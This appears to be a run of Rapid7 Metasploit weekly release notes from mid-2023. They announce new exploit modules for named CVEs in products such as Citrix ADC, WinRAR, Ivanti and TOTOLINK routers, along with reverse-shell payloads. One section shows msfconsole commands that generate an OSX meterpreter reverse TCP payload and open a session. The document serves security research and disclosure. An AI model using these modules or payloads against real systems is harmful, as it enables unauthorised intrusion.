Description: This module exploits an unauthenticated command injection vulnerability by combining two critical vulnerabilities in Apache Airflow 1.10.10. The first, CVE-2020-11978, is an authenticated command injection vulnerability found in one of Airflow’s example DAGs, example_trigger_target_dag, which allows any authenticated user to run arbitrary OS commands as the user running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default setting of Airflow 1.10.10 that allows unauthenticated access to Airflow’s Experimental REST API to perform malicious actions such as creating the vulnerable DAG above.

Lexmark Device Embedded Web Server RCE

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18333 contributed by jheysel-r7
Path: linux/http/lexmark_faxtrace_settings

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability

Authors: Kazamayc https://github.com/Kazamayc and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18365 contributed by h00die-gr3y
Path: linux/http/totolink_unauth_rce_cve_2023_30013

Description: This adds an exploit module that leverages a command insertion vulnerability in TOTOLINK X5000R Wireless Gigabit Router firmware X5000R_V9.1.0u.6118_B20201102. This allows remote code execution as the user running the webserver. This user is typically the root user.

Ivanti Avalanche MDM Buffer Overflow

Authors: A researcher at Tenable and Ege BALCI egebalci <Ege BALCI [email protected]>
Type: Exploit
Pull request: #18321 contributed by EgeBalci
Path: windows/misc/ivanti_avalanche_mdm_bof

Description: This PR adds an exploit module that targets Ivanti Avalanche MDM versions before v6.4.1, leveraging a buffer overflow condition.

Unix Command Shell, Reverse TCP (via socat)

Author: jheysel-r7
Type: Payload (Single)
Pull request: #18333 contributed by jheysel-r7
Path: cmd/unix/reverse_socat_tcp

Description: This adds an exploit module that leverages an unauthenticated remote code execution vulnerability in certain Lexmark devices through 2023-02-19. This vulnerability (CVE-2023-26068) is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked if they would like to add an Admin user.

Enhancements and features (5)

• #18294 from zgoldman-r7 – Improves error messages when failing to interact with a network interface such as calling set LHOST=.
• #18358 from zeroSteiner – This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
• #18361 from cgranleese-r7 – Updates the search command with additional the search keywords stage: :stager: and adapter:.
• #18374 from h00die – Fixes a bug in 7 modules which specified the RelatedModules metadata incorrectly. Now the RelatedModules data is correctly shown to the user when running the info command.
• #18377 from ErikWynter – This change adds a check to the smtp_relay auxiliary/scanner/smtp/smtp_relay scanner module to confirm if the EHLO command is supported by the server. If not, the module will try to initiate the session using the HELO command instead.

Bugs fixed (4)

• #18359 from smashery – Updates the admin/kerberos/forge_ticket module to work with newer Windows Server releases, in particular post Windows Server October 2022. Now, when forging Golden tickets, the forged PAC contains a PAC requestor element with the forged user SID, and additional PAC attributes.
• #18369 from adfoster-r7 – This PR fixes a crash with OptAddressLocal that was caused by darwin AF_LINK having an empty string for its addr.
• #18370 from adfoster-r7 – This PR fixes an issue where msfrpc would hang when updating saved command history.
• #18378 from adfoster-r7 – Removes fremaining debug logging from Prometheus Exporter.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.34…6.3.35
• Full diff 6.3.34…6.3.35

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/09/15/metasploit-weekly-wrap-up-27/

Flask Cookies

This week includes two modules related to Flask cookie signatures. One is specific to Apache Superset where session cookies can be resigned, allowing an attacker to elevate their privileges and dump the database connection strings. While adding this functionality, community member h00die also added a module for generically working with the default session cookies used by Flask. This generic module auxiliary/gather/python_flask_cookie_signer allows for bruteforcing common signing keys from a wordlist as well as decoding cookies and resigning cookies if the key is known (or recovered).

New module content (12)

Apache Superset Signed Cookie Priv Esc

Authors: Naveen Sunkavally, Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/apache_superset_cookie_sig_priv_esc
AttackerKB reference: CVE-2023-27524

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Prometheus API Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_api_gather

Description: This PR creates two modules: one to interrogate Prometheus API endpoints for information and one to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Prometheus Node Exporter And Windows Exporter Information Gather

Author: h00die
Type: Auxiliary
Pull request: #18290 contributed by h00die
Path: auxiliary/gather/prometheus_node_exporter_gather

Description: This PR creates 2 modules: one to interrogate Prometheus API endpoints for information, the other to query Prometheus Node Exporters for information. This is supported by a new Prometheus library and specs.

Python Flask Cookie Signer

Authors: Spencer McIntyre, h00die, and paradoxis
Type: Auxiliary
Pull request: #18180 contributed by h00die
Path: auxiliary/gather/python_flask_cookie_signer

Description: This adds two modules for targeting vulnerabilities related to the signing of Flask’s session cookies. One of them exploits a vulnerability in Apache Superset which is identified as CVE-2023-27524.

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)

Authors: James Horseman, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #18330 contributed by jheysel-r7
Path: exploits/linux/http/ivanti_sentry_misc_log_service
AttackerKB reference: CVE-2023-38035

Description: This PR adds an exploit module that targets Ivanti Sentry (formerly Mobileiron Sentry). Ivanti Sentry is vulnerable to an authentication by-pass which exposes API functionality,allowing for code execution in the context of the root user.

Kibana Timelion Prototype Pollution RCE

Authors: Gaetan Ferry, Michał Bentkowski, and h00die
Type: Exploit
Pull request: #18316 contributed by h00die
Path: exploits/linux/http/kibana_timelion_prototype_pollution_rce
AttackerKB reference: CVE-2019-7609

Description: Adds a module that exploits a prototype pollution vulnerability in the Kibana Timelion visualiser resulting in Remote Code Execution.

OpenTSDB 2.4.1 unauthenticated command injection

Authors: Daniel Abeles, Erik Wynter, and Gal Goldstein
Type: Exploit
Pull request: #18350 contributed by ErikWynter
Path: exploits/linux/http/opentsdb_key_cmd_injection
AttackerKB reference: CVE-2023-25826

Description: Adds a new module that exploits an unauthenticated command injection vulnerability in OpenTSDB through 2.4.1 resulting in root access.

VMware vRealize Log Insight Unauthenticated RCE

Authors: Ege BALCI and Horizon3.ai Attack Team
Type: Exploit
Pull request: #18273 contributed by EgeBalci
Path: exploits/linux/http/vmware_vrli_rce
CVE reference: ZDI-23-115

Description: This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.

Sonicwall

Authors: Ron Bowes and fulmetalpackets
Type: Exploit
Pull request: #18302 contributed by rbowes-r7
Path: exploits/multi/http/sonicwall_shell_injection_cve_2023_34124
AttackerKB reference: CVE-2023-34127

Description: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.

WinRAR CVE-2023-38831 Exploit

Author: Alexander "xaitax" Hagenah
Type: Exploit
Pull request: #18341 contributed by xaitax
Path: exploits/windows/fileformat/winrar_cve_2023_38831
AttackerKB reference: CVE-2023-38831

Description: This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.

LG Simple Editor Remote Code Execution

Authors: Ege Balcı and rgod
Type: Exploit
Pull request: #18329 contributed by EgeBalci
Path: exploits/windows/http/lg_simple_editor_rce
CVE reference: ZDI-23-1204

Description: This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.

Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability

Authors: Esteban.kazimirow, Ricardo Narvaja, and jheysel-r7
Type: Exploit
Pull request: #18250 contributed by jheysel-r7
Path: exploits/windows/local/cve_2023_28252_clfs_driver
AttackerKB reference: CVE-2023-28252

Description: Adds a new privilege escalation module that exploits a vulnerable clfs.sys driver on Windows to spawn a new NT AUTHORITY/SYSTEM Meterpreter session. The vulnerable driver comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 2022 (Build 20348) operating systems.

Enhancements and features (8)

• #17474 from prabhatjoshi321 – This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1.
• #18262 from cgranleese-r7 – Adds the ability to select favorite modules with the use command after running show favorites, similar to the search command.
• #18270 from pbarry25 – Improves tab completion for the set and unset commands.
• #18327 from h00die – Fixes an issue where specifying a TLS version in the ssl_version module would result in a NoMethodError.
• #18349 from adfoster-r7 – Adds Meterpreter compatibility matrix generation to Github’s acceptance test runs. Now, it’s possible to visually see which Meterpreters support particular functionality.
• #18354 from zeroSteiner – This PR moves the MSF tip to be displayed while Metasploit is loading. This is similar to what a lot of video games do (e.g. Skyrim).
• #18356 from adfoster-r7 – This PR updates the Docker Golang version.
• #18357 from adfoster-r7 – Adds additional error reporting to the Meterpreter integration tests.

Bugs fixed (2)

• #17970 from YiDa858 – Fixes an error in nessus_db_import and nessus_scan_export commands that prevented them from completing successfully.
• #18362 from adfoster-r7 – Fixes an edgecase which could cause a new msfrpc console instance to hang forever.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.33…6.3.34
• Full diff 6.3.33…6.3.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure

Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability.

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

• #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
• #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.32…6.3.33
• Full diff 6.3.32…6.3.33

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/09/01/metasploit-weekly-wrap-up-25/

Pumpkin Spice Modules

Here in the northern hemisphere, fall is on the way: leaves changing, the air growing crisp and cool, and some hackers changing the flavor of their caffeine. This release features a new exploit module targeting Apache NiFi as well as a new and improved library to interact with it.

New module content (1)

Apache NiFi H2 Connection String Remote Code Execution

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #18257 contributed by h00die
Path: exploits/linux/http/apache_nifi_h2_rce
AttackerKB reference: CVE-2023-34468

Description: This adds an exploit module for a Apache NiFi h2 remote code execution identified as CVE-2023-34468. Versions 0.0.2 through 1.21.0 are vulnerable and allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This also adds a library with helper functions for modules targeting this product.

Enhanced Modules

Modules which have either been enhanced, or renamed:

Elasticsearch Enumeration Utility

Authors: Silas Cutler and h00die
Type: Auxiliary
Pull request: #18310 contributed by h00die
Path: auxiliary/gather/elasticsearch_enum

Description: This updates the Elasticsearch auxiliary module. It has been renamed to elastic_enum, accepts credentials and will store data to disk that is pulled from the target.

• #18247 from EgeBalci – This adds an exploit module that leverages an authentication bypass and an arbitrary file upload in Netgear ProSAFE NMS300. These vulnerabilities have been identified as CVE-2023-38096 and CVE-2023-38098 respectively and affects versions below 1.7.0.22. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges.

Enhancements and features (1)

• #18309 from zeroSteiner – This updates the ldap_query module to stream the results instead of collecting them all at once. This should improve the UX of using the module in large target environments with 10s of thousands of accounts and the like.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.31…6.3.32
• Full diff 6.3.31…6.3.32

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/08/25/metasploit-weekly-wrap-up-24/

Power[shell]Point

This week’s new features and improvements start with two new exploit modules leveraging CVE-2023-34960 Chamilo versions 1.11.18 and below and CVE-2023-26469 in Jorani 1.0.0. Like CVE-2023-34960, I too, feel attacked by PowerPoint sometimes.
We also have several improvements, including additions to fetch payloads, PostgreSQL authentication, and documentation.

New module content (2)

Chamilo unauthenticated command injection in PowerPoint upload

Authors: Randorisec and h00die-gr3y
Type: Exploit
Pull request: #18233 contributed by h00die-gr3y
Path: exploits/linux/http/chamilo_unauth_rce_cve_2023_34960
AttackerKB reference: CVE-2023-34960

Description: This adds an exploit module that leverages an unauthenticated remote command execution vulnerability Chamilo versions 1.11.18 and below. This vulnerability is identified as CVE-2023-34960. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.

Jorani unauthenticated Remote Code Execution

Author: RIOUX Guilhem (jrjgjk)
Type: Exploit
Pull request: #18123 contributed by Guilhem7
Path: exploits/multi/php/jorani_path_trav
AttackerKB reference: CVE-2023-26469

Description: This PR adds a module that chains together a log poisoning LFI redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.

Enhancements and features (4)

• #18214 from bwatters-r7 – This makes two improvements to the fetch payloads. The first improvement is that the FETCH_SRVHOST option will be set to LHOST when LHOST is set and FETCH_SRVHOST is not, meaning there is now one less option users need to set when using a payload with a reverse stager. The second improvement is that the default command for the Windows HTTP payload has been changed to CERTUTIL which will offer better compatibility with older versions of Windows than the previous CURL command. The HTTPS and TFTP payloads will still default to CURL.
• #18276 from adfoster-r7 – Updates all PostgreSQL modules to now support a newer form of authentication (SASL-SCRAM-256) that pen testers are seeing in the wildnow more frequently seeing in the wild. This includes the modules for PostgreSQL authentication brute force, version fingerprinting, running queries, etc.
• #18307 from ismaildawoodjee – This fixes documentation typos with the exploit/multi/http/subrion_cms_file_upload_rce module.
• #18308 from ismaildawoodjee – Improves the readability of documentation/modules/exploit/windows/http/smartermail_rce.

Bugs fixed (5)

• #18272 from sfewer-r7 – This fixes an issue in the exploit module multi/http/adobe_coldfusion_rce_cve_2023_26360 when the target ColdFusion server is deployed with a Development profile.
• #18287 from zeroSteiner – This fixes a stack trace thrown by the forge_ticket module when the SPN datastore option was left blank. The module now fails due to bad-config and gives a detailed error message.
• #18297 from adfoster-r7 – This fixes the broken scanner/mysql/mysql_authbypass_hashdump module and adds documentation for the module.
• #18298 from adfoster-r7 – Changes the behavior of setting LHOST as an interface name, for example with set LHOST eth0. Previously, a non-deterministic IP would be resolved from the adapter name if the adapter had multiple IPv4/IPv6 addresses registered. Now the lowest ordinal IPv4 addresses is preferenced first, followed by any IPv6 addresses.
• #18306 from zeroSteiner – Fixes a crash when parsing ThriftHeader binary data.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.30…6.3.31
• Full diff 6.3.30…6.3.31

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/08/18/metasploit-weekly-wrap-up-23/

Meterpreter Testing

This week’s release adds new payload tests to our automated test suite. This is intended to help the team and community members identify issues and behavior discrepancies before changes are made. Payloads run on a variety of different platforms including Windows, Linux, and OS X each of which has multiple Meterpreter implementations available that are now tested to help ensure consistency. This should improve payload stability and make testing easier for community members that are contributing new features to the payloads.

New module content (4)

H2 Web Interface Create Alias RCE

Authors: Nairuz Abulhul, gambler, h00die, and h4ckNinja
Type: Exploit
Pull request: #18226 contributed by h00die
Path: exploits/linux/http/h2_webinterface_rce

Description: This PR adds an exploit against the H2 database’s web console. An authenticated user can issue requests to invoke built-in functionality to execute arbitrary code. There is no CVE for this issue.

Maltrail Unauthenticated Command Injection

Authors: Chris Wild and Ege BALCI
Type: Exploit
Pull request: #18280 contributed by EgeBalci
Path: exploits/unix/http/maltrail_rce

Description: This PR adds a module for an unauthenticated RCE vulnerability in Maltrail, a malicious traffic detection system. The module author indicated that this vulnerability does not have a CVE associated with it as the vendor (product team in this case) declined to assign one.

RaspAP Unauthenticated Command Injection

Authors: Ege BALCI and Ismael0x00
Type: Exploit
Pull request: #18263 contributed by EgeBalci
Path: exploits/unix/http/raspap_rce
AttackerKB reference: CVE-2022-39986

Description: This PR adds an unauthenticated command injection module for the RaspAP webgui application.

Greenshot .NET Deserialization Fileformat Exploit

Authors: bwatters-r7 and p4r4bellum
Type: Exploit
Pull request: #18253 contributed by bwatters-r7
Path: exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634
AttackerKB reference: CVE-2023-34634

Description: This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

Enhancements and features (1)

• #18288 from adfoster-r7 – Adds stability enhancements to Meterpreter payloads. Additionally, this adds a large suite of automated sanity tests to Github Actions that verify OSX/Windows/Linux/Python/Java/PHP Meterpreter payloads work.

Bugs fixed (3)

• #18275 from adfoster-r7 – Updates the module metadata for the Java reverse_http and reverse_https stagers to be treated as a dynamic payload size, instead of a static/fixed size. This size change can happen as the Java payload contains a user-configurable HTTP callback URL, and combined with the Zip compression present in JAR files – the overall generated payload size can change as a result.
• #18278 from rorymckinley – Fixes a crash when running the auxiliary/scanner/mysql/mysql_login module against newer versions of MySQL.
• #18289 from zeroSteiner – Fixes a typo in the exploit/freebsd/http/citrix_formssso_target_rce docs.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.29…6.3.30
• Full diff 6.3.29…6.3.30

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/08/11/metasploit-weekly-wrapup-8/

New module content (1)

Metabase Setup Token RCE

Authors: Maxwell Garrett, Shubham Shah, and h00die
Type: Exploit
Pull request: #18232 contributed by h00die
Path: exploits/linux/http/metabase_setup_token_rce
AttackerKB reference: CVE-2023-38646

Description: This adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1 contain a bug where an unauthenticated user can retrieve a setup-token. With this, they can query an API endpoint to setup a new database, then inject an H2 connection string RCE.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

• #18264 from zeroSteiner – Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.

Enhancements and features (6)

• #18191 from jvoisin – This adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC, and WLS containers.
• #18224 from rorymckinley – This adds the first iteration of specs for SSH Login scanner.
• #18231 from ErikWynter – This adds index selection for the modules returned via the favorites (or show favorites) command.
• #18244 from cgranleese-r7 – Adds tests to ensure the consistency of Metasploit payloads.
• #18274 from wvu – Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.

Bugs fixed (2)

• #18220 from dwelch-r7 – Adds additional error handling when loading Metasploit payloads to msfconsole’s startup process to ensure missing payloads do not crash msfconsole.
• #18260 from adfoster-r7 – This adds a fix to verify the EC2_ID module option is validated.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.28…6.3.29
• Full diff 6.3.28…6.3.29

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/08/04/metasploit-weekly-wrap-up-22/

Fly High in the Sky With This New Cloud Exploit!

This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital’s MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:
osx/aarch64/meterpreter/reverse_tcp
osx/aarch64/meterpreter_reverse_https
osx/aarch64/meterpreter_reverse_tcp
osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

• Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
• DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage an authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack’s rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 – Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds AWS instance connection sessions.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

• #18223 from adfoster-r7 – This PR fixes broken msfconsole command history management when switching between shell sessions.
• #18239 from h00die – Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
• #18249 from adfoster-r7 – Provide better error messages when failing to load Mettle extensions, such as the extended API extapi.
• #18255 from adfoster-r7 – Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

• #18203 from adfoster-r7 – Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
• #18209 from adfoster-r7 – This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
• #18234 from D00Movenok – This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
• #18238 from dwelch-r7 – Fixes an issue where when setting USERNAME, USER_FILE and PASS_FILE with scanner modules. Previously the first username in the USER_FILE would not be tested against any password in PASS_FILE, this is now fixed.
• #18243 from adfoster-r7 – This PR fixes an issue were an appscan import would fail due to an empty proof.
• #18248 from adfoster-r7 – Fix bootup warning when running the JSON msfrpc service.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.27…6.3.28
• Full diff 6.3.27…6.3.28

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/07/28/metasploit-weekly-wrap-up-21/

Unauthenticated RCE in VMware Product

This week, community contributor h00die added an exploit module that leverages a command injection vulnerability in VMWare Aria Operations for Networks, formerly known as vRealize Network Insight. Versions 6.2 to 6.10 are vulnerable (CVE-2023-20887). A remote attacker could abuse the Apache Thrift RPC interface by sending specially crafted data and get unauthenticated remote code execution on the underlying operating system as the root user. The module first bypasses the reverse proxy that protects the RPC interface and executes its payload with root privileges. This vulnerability has been rated as critical by VMware, with a CVSSv3 base score of 9.8.

Again, WordPress Plugin

Community contributor h00die-gr3y added an exploit module that targets the File Manager Advanced Shortcode WordPress plugin. This module leverages a flaw in the data validation mechanism when uploading a file and gets unauthenticated remote code execution. The plugin does not correctly prevent uploading files with disallowed MIME types. This vulnerability is identified as CVE-2023-2068 and affects version 2.3.2 and prior.

Kerberos Authentication and LDAP socks Proxies support

